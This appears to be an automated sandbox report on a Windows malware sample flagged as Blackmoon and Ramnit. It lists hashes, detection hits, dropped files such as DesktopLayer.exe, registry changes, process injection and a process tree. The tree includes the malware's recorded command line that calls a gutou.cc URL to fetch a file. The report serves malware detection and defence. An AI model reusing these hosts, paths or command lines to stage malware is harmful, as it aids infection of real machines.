Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-01-2025 03:00
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
Resource
win7-20240903-en
General
-
Target
JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
-
Size
660KB
-
MD5
44bc6a85155a66270e3f3519dbe25440
-
SHA1
1e866e797be3ae02cfced75ca11dfbdc26ead266
-
SHA256
d4872dd5974c293e0594d61291212d9868657918a0f85c34166be16e6d46f605
-
SHA512
ac22c38573d67c8ef4eea07d9bc79776386917f40b449988cdee16e39b7d1c2a583191a4201627b1deb16cb03fb9d72a77b79609b9728009a5e2651f6f73dc73
-
SSDEEP
12288:k16zhbcKiFyKBU/eEr3kxoj2x2P7F+WunPv1:hdbyyKymE7kydP7Y/n
Malware Config
Signatures
-
Blackmoon family
-
Detect Blackmoon payload 7 IoCs
resource yara_rule behavioral2/memory/2976-58-0x0000000000400000-0x00000000005BE000-memory.dmp family_blackmoon behavioral2/memory/2976-62-0x0000000000400000-0x00000000005BE000-memory.dmp family_blackmoon behavioral2/memory/2976-61-0x0000000000400000-0x00000000005BE000-memory.dmp family_blackmoon behavioral2/memory/2976-63-0x0000000000400000-0x00000000005BE000-memory.dmp family_blackmoon behavioral2/files/0x000300000000070b-67.dat family_blackmoon behavioral2/memory/2976-68-0x0000000000400000-0x00000000005BE000-memory.dmp family_blackmoon behavioral2/memory/1504-174-0x0000000000400000-0x00000000005BE000-memory.dmp family_blackmoon -
Ramnit family
-
Executes dropped EXE 6 IoCs
pid Process 3604 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe 1332 DesktopLayer.exe 1056 UpDate.exe 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 4808 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe 4024 DesktopLayer.exe -
resource yara_rule behavioral2/files/0x000c000000023b30-3.dat upx behavioral2/memory/3604-4-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral2/memory/3604-7-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral2/memory/2976-45-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-55-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1332-60-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral2/memory/2976-53-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-51-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-49-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-47-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-43-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-41-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-39-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-37-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-35-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-32-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-30-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-26-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-24-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-22-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-20-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-16-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-13-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-11-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1332-57-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral2/memory/2976-28-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-18-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/2976-14-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4808-76-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral2/memory/1504-97-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4024-125-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral2/memory/1504-94-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1504-93-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1504-90-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1504-88-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1504-86-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1504-84-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1504-82-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1504-81-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/1504-78-0x0000000010000000-0x000000001003E000-memory.dmp upx -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\DesktopLayer.exe JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe File opened for modification C:\Program Files (x86)\Microsoft\DesktopLayer.exe JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe File opened for modification C:\Program Files (x86)\Microsoft\pxCAE1.tmp JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe File opened for modification C:\Program Files (x86)\Microsoft\DesktopLayer.exe JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe File opened for modification C:\Program Files (x86)\Microsoft\px86E3.tmp JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DesktopLayer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UpDate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DesktopLayer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31153145" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1673124751" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "442465404" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1666944702" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1666934596" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31153145" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{8EF555AB-C7EC-11EF-AEE2-EE6C25FCE24B} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1840388379" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31153145" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31153145" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 1332 DesktopLayer.exe 1332 DesktopLayer.exe 1332 DesktopLayer.exe 1332 DesktopLayer.exe 1332 DesktopLayer.exe 1332 DesktopLayer.exe 1332 DesktopLayer.exe 1332 DesktopLayer.exe 4024 DesktopLayer.exe 4024 DesktopLayer.exe 4024 DesktopLayer.exe 4024 DesktopLayer.exe 4024 DesktopLayer.exe 4024 DesktopLayer.exe 4024 DesktopLayer.exe 4024 DesktopLayer.exe 1116 msedge.exe 1116 msedge.exe 4460 msedge.exe 4460 msedge.exe 4340 identity_helper.exe 4340 identity_helper.exe 3916 msedge.exe 3916 msedge.exe 3916 msedge.exe 3916 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 3312 iexplore.exe 3312 iexplore.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe 4460 msedge.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 3312 iexplore.exe 3312 iexplore.exe 220 IEXPLORE.EXE 220 IEXPLORE.EXE 220 IEXPLORE.EXE 220 IEXPLORE.EXE 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 3312 iexplore.exe 3312 iexplore.exe 3516 IEXPLORE.EXE 3516 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2976 wrote to memory of 3604 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 83 PID 2976 wrote to memory of 3604 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 83 PID 2976 wrote to memory of 3604 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 83 PID 3604 wrote to memory of 1332 3604 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe 84 PID 3604 wrote to memory of 1332 3604 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe 84 PID 3604 wrote to memory of 1332 3604 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe 84 PID 1332 wrote to memory of 3312 1332 DesktopLayer.exe 85 PID 1332 wrote to memory of 3312 1332 DesktopLayer.exe 85 PID 3312 wrote to memory of 220 3312 iexplore.exe 86 PID 3312 wrote to memory of 220 3312 iexplore.exe 86 PID 3312 wrote to memory of 220 3312 iexplore.exe 86 PID 2976 wrote to memory of 1056 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 87 PID 2976 wrote to memory of 1056 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 87 PID 2976 wrote to memory of 1056 2976 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 87 PID 1056 wrote to memory of 1504 1056 UpDate.exe 97 PID 1056 wrote to memory of 1504 1056 UpDate.exe 97 PID 1056 wrote to memory of 1504 1056 UpDate.exe 97 PID 1504 wrote to memory of 4808 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 98 PID 1504 wrote to memory of 4808 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 98 PID 1504 wrote to memory of 4808 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 98 PID 4808 wrote to memory of 4024 4808 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe 99 PID 4808 wrote to memory of 4024 4808 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe 99 PID 4808 wrote to memory of 4024 4808 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe 99 PID 4024 wrote to memory of 1380 4024 DesktopLayer.exe 100 PID 4024 wrote to memory of 1380 4024 DesktopLayer.exe 100 PID 3312 wrote to memory of 3516 3312 iexplore.exe 101 PID 3312 wrote to memory of 3516 3312 iexplore.exe 101 PID 3312 wrote to memory of 3516 3312 iexplore.exe 101 PID 1504 wrote to memory of 4460 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 103 PID 1504 wrote to memory of 4460 1504 JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe 103 PID 4460 wrote to memory of 2008 4460 msedge.exe 104 PID 4460 wrote to memory of 2008 4460 msedge.exe 104 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107 PID 4460 wrote to memory of 2632 4460 msedge.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exeC:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Program Files (x86)\Microsoft\DesktopLayer.exe"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3312 CREDAT:17410 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:220
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3312 CREDAT:17416 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3516
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\data\UpDate.exeC:\Users\Admin\AppData\Local\Temp\data\UpDate.exe 3.0 %43%3A%5C%55%73%65%72%73%5C%41%64%6D%69%6E%5C%41%70%70%44%61%74%61%5C%4C%6F%63%61%6C%5C%54%65%6D%70%5C%4A%61%66%66%61%43%61%6B%65%73%31%31%38%5F%34%34%62%63%36%61%38%35%31%35%35%61%36%36%32%37%30%65%33%66%33%35%31%39%64%62%65%32%35%34%34%30%2E%65%78%65 ¼Ù http://www.gutou.cc/up/shiyimiaozan.txt2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exeC:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe ÃüÁîÆô¶¯3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exeC:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Program Files (x86)\Microsoft\DesktopLayer.exe"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"6⤵
- Modifies Internet Explorer settings
PID:1380
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://gutou.cc/ad/shiyi/dingyue.htm4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8bc4746f8,0x7ff8bc474708,0x7ff8bc4747185⤵PID:2008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:25⤵PID:2632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:1116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:85⤵PID:692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:15⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:15⤵PID:4756
-
-
